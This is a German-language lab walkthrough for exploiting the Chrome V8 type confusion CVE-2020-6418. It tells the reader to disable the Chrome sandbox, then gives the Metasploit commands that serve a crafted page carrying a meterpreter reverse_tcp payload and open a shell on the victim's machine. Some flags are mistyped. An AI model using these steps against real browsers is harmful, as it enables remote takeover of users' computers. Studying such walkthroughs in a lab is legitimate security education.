
Exploit für CVE-2020-6418, eine Typverwechslung in V8, die Remote-Codeausführung über eine manipulierte HTML-Seite ermöglicht. Verwendet Metasploit, um eine Reverse-Shell-Payload zu liefern.
Die CVE-2020-6418 betrifft die Typverwechslung in V8 in Google Chrome. Die betroffenen Versionen waren älter als 80.0.3987.122. Die Schwachstelle wird von einem entfernten Angreifer ausgenutzt, der über eine manipulierte HTML-Seite auf die Shell eines Zielgeräts zugreift.
Note : The Google chrome browser should run with no sandbox for the exploit to be succesfull.
i) Erstellen Sie eine Verknüpfung für Google Chrome
ii) Klicken Sie auf Eigenschaften > gehen Sie zur Option namens „Target“
iii) Fügen Sie am Ende der EXE nach einem Leerzeichen -no--sandbox hinzu
iv) Klicken Sie auf Übernehmen > OK
v) Öffnen Sie ein neues Google-Chrome-Fenster. Dort wird ein Pop-up mit folgendem Inhalt angezeigt.
You are using an unsupported command-line flag: -no-sandbox. Stability ans security will suffer
Da wir Kali als Umgebung für die Durchführung des Exploits verwenden, ist Metasploit als integriertes Tool in der Distribution enthalten. Wenn Sie jedoch andere Distributionen verwenden, müssen wir Metasploit einrichten, bevor wir mit dem Exploit beginnen.
Für weiterführende Informationen siehe die Metasploit-Installation.
i) Starten des Metasploit-Frameworks
> msfconsole
ii) Den Exploit finden
> search chrome_js
iii) Den verfügbaren Exploit aus der obigen Ausgabe verwenden
> Use exploit/multi/browser/chrome_jscreate_sideeffect
iv) Die SRVHOST-IP-Adresse angeben
> set SRVHOST <ip address>
v) Das Ziel angeben Hier gibt es zwei Optionen
> set Target " Number "
vi) Payload angeben
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
vii) Zum Überprüfen der aktuellen Einstellungen und aktivierten Optionen.
> show options
viii) Zum Ausführen des Exploits
> run (or) > exploit
ix) Sie erhalten eine URL, die im Browser aufgerufen werden muss, damit die Sitzung aktiv wird.
x) Sobald der Benutzer die URL aufruft, wird eine Sitzung erstellt. Um dies zu überprüfen
> show sessions
xi) Mit der Sitzung können wir die Systeminformationen des Benutzers abrufen / in die Shell wechseln.
> sessions <number>
> shell